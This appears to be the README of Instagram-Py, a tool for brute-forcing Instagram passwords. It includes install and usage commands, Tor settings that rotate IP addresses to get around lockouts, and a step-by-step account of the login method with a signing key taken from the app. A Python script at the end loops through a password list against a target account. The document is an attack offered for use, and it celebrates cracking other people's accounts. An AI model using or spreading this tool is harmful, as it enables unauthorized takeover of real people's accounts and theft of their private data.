Instagram-py performs slick brute force attack on Instagram without any type of password limitingand also resumes your attack in ease.—DeathSec
See the 'Algorimthm' section down below for more hackery!
Instagram-Py Scripting
Craft your own python script which will embed into Instagram-Py for Maximum Customization of your brute force attack , example: What if you want a message sent to your phone when an account is hacked?
Resumes Attacks when the same wordlist is used on the same Username
Dumps successfully cracked accounts in the dump
Maximum Customization! ( This includes multiple attack vectors! )
Fast and Clean Code , no ugly selenum drivers! ( Pure Requests )
Elegant Tor Identity Change with Stem ( Tor's Official Library for Python )
Depends on: python3 , tor , requests , requests[socks] , stem
$ sudo pip3 install instagram-py --upgrade
Make sure you have got the latest version of pip(>= 9.0 and python(>= 3.6)
$ sudo easy_install3 -U pip # you have to install python3-setuptools , update pip $ sudo pip3 install requests --upgrade $ sudo pip3 install requests[socks] $ sudo pip3 install stem $ sudo pip3 install instagram-py $ instagram-py # installed successfully $ # Configuration is Super Important so Lets Create One $ instagram-py --create-configuration # follow the steps...
As of v2.0.0 Configuration is Simply done by Passing an Argument to Instagram-Py
$ instagram-py --create-configuration $ # OR $ instagram-py -cc
Or if you just want the default settings without the annoying questions then
$ instagram-py --create-configuration --default-configuration $ # OR $ instagram-py -cc -dc
open your tor configuration file usually located at /etc/tor/torrc
$ sudo vim /etc/tor/torrc # open it with your text editor
search for the file for this specific section
## The port on which Tor will listen for local connections from Tor ## controller applications, as documented in control-spec.txt. #ControlPort 9051
uncomment 'ControlPort' by deleting the # before 'ControlPort' , now save the file and restart your tor server
now you are ready to crack any instagram account , make sure your tor configuration matched ~/instapy-config.json
Finally , now you can use instagram-py!
Instagram-Py Scripting lets you run Custom Python Scripts Inside Instagram-Py!
Never Run Instagram-Py with Multiple Instance! , Use Instagram-Py Scripting Instead!
$ instagram-py -u your_account_username -pl path_to_password_list
Note: Without the -c optional argument , instagram-py will not continue the attack
usage: instagram-py [-h] [--username USERNAME] [--password-list PASSWORD_LIST] [--script SCRIPT] [--inspect-username INSPECT_USERNAME] [--create-configuration] [--default-configuration] [--countinue] [--verbose] optional arguments: -h, --help show this help message and exit --username USERNAME, -u USERNAME username for Instagram account --password-list PASSWORD_LIST, -pl PASSWORD_LIST password list file to try with the given username. --script SCRIPT, -s SCRIPT Instagram-Py Attack Script. --inspect-username INSPECT_USERNAME, -i INSPECT_USERNAME Username to inspect in the instagram-py dump. --create-configuration, -cc Create a Configuration file for Instagram-Py with ease. --default-configuration, -dc noconfirm for Instagram-Py Configuration Creator! --countinue, -c Countinue the previous attack if found. --verbose, -v Activate Verbose mode. ( Verbose level ) example: instagram-py -c -vvv -u instatestgod__ -pl rockyou.txt Report bug, suggestions and new features at
Instagram-Py now lets you run your custom scripts inside of it for maximum customization of your attacks. This Scripts are simple Python Scripts ( You Can just do anything that is possible with python )
Refer the Wiki to get full information about Instagram-Py Scripting , Also look into the examples tree present in this repo , it contains simple example scripts.
You Can Always View the Cracked Passwords Using this command!
$ instagram-py -i instatestgod__ $ # Displays record if it is cracked in the past!
Instagram-Py uses a very simple algorithm for checking passwords efficiently , this section is dedicated for those who wish to recreate this program in any other language.
You can see this live when you run the tool in max verbosity
$ instagram-py -vvv -u instatestgod__ -pl password_list.lst
You can also use Instagram-Py as a module , so that you can also use it in your script
Step 1: Get the magic cookie , which is used to verify device integrity!
Getting the magic cookie is the simplest job , all we need to do is send a get request to , where the guid get parameter is a random 32 character string. The random 32 character string can be generator using python's simple uuid library , to be specific v4 of UUID. So finally we just have to request the url and get the cookie named csrftoken , if we observe the response header we could see that our cookie only expires next year the same day. So by this we only have to make this request once and can use it for a year! How vulnerable is that?...

Step 2: Build a post request with Instagram's signature.
This part is simple but may be difficult to setup , first i need to get instagram's signature which is only present in their free apk from google play , Remember our Strength can be our Weakness , All i have to do reverse engineer the apk and find the signature, lets call it ig_sig.
ig_sig = 4f8732eb9ba7d1c8e8897a75d6474d4eb3f5279137431b2aafb71fafe2abe178 ig_version = 4
Instagram uses HMAC Authentication for login stuff, so lets use python's hmac library. But first we have to build our body which will be encoded in json for it to actually sign with ig_sig , So the post body looks likes this...
The above will be encoded to JSON , So to test the password we have to post the data to this url<SIGNED BODY>.<URL ENCODED JSON DATA> .
<SIGNED BODY>: using HMAC , sign our json encoded data with ig_sig and return a hexa value.
<URL ENCODED JSON DATA>: the same data in json but we url encode so that it goes properly to insta!
So to test a account with username as USERNAME and password with PASSWORD we simply request this url
Take a look how I did it...
Step 3: With the json response and response code , we determine the password is correct or wrong.
if We get response 200 then the login is success but if we get response 400 , We inspect the json data for clues if it is the correct password or invalid request or too many tries. So we inspect the message from instagram json response!
Message = Challenge Required , then the password is correct but instagram got some questions so we must wait until the user logs in and answer the question and if we are lucky they will not change the password and we could login in later(Most of the time people won't change the password!)
Message = The password you entered is incorrect. , then the password is incorrect for sure , try another.
Message as something like word invalid in it then , some other error so just try again, can happen because of wordlist encoding error which i ignored because all the worldlist have encoding error!
Message = Too many tries , Time to change our ip and loop but we don't want to change our magic cookie
Thats it you just hacked instagram with a very simple algorithm!
Contribute anything you can to this repo (Issues | Pull request) , help is much appreciated.
Please Refer CONTRIBUTING for more information on contributing!
Instagram-Py supports to be used as a module as of v1.3.2 , so you don't want to reproduce my code. Just use it!
For some reason you wish not to use my software then you can use my software as a module and embed into your own software , anyway its native so its just gonna run the same as the official command-line tool unless you do something crazy.
Follow the same installation method mentioned above to install Instagram-Py API.
This is a simple script to conduct a bructe force attack using instagram-py as a API.
#!/usr/bin/env python3 ''' This is the same thing that is in the __init__ file of the command-line tool. ''' from InstagramPy.InstagramPyCLI import InstagramPyCLI from InstagramPy.InstagramPySession import InstagramPySession , DEFAULT_PATH from InstagramPy.InstagramPyInstance import InstagramPyInstance from datetime import datetime username = "TARGET ACCOUNT USERNAME" password = "PASSWORD LIST PATH" appInfo = { "version" : "0.0.1", "name" : "Instagram-Py Clone", "description" : "Some Module to crack instagram!", "author" : "YourName", "company" : "YourCompany", "year" : "2017", "example" : "" } cli = InstagramPyCLI(appinfo = appInfo , started = , verbose_level = 3) ''' # USE THIS IF YOU WANT cli.PrintHeader() cli.PrintDatetime() ''' session = InstagramPySession(username , password , DEFAULT_PATH , DEFAULT_PATH , cli) session.ReadSaveFile(True) # True to countinue attack if found save file. ''' # USE THIS IF YOU WANT cli.PrintMagicCookie(session.magic_cookie) ''' ''' Defining @param cli = None will make Instagram-Py run silently so you can you use your own interface if you like. or if you want to use the official interface then declare like this instagrampy = InstagramPyInstance(cli = cli , session = session) ''' instagrampy = InstagramPyInstance(cli = None ,session = session) while not instagrampy.PasswordFound(): print('Trying... '+session.CurrentPassword()) instagrampy.TryPassword() if instagrampy.PasswordFound(): print('Password Found: '+session.CurrentPassword()) exit(0)
Refer the Wiki to get full information about the api ,
The MIT License,
Copyright (C) 2017 The Future Shell , DeathSec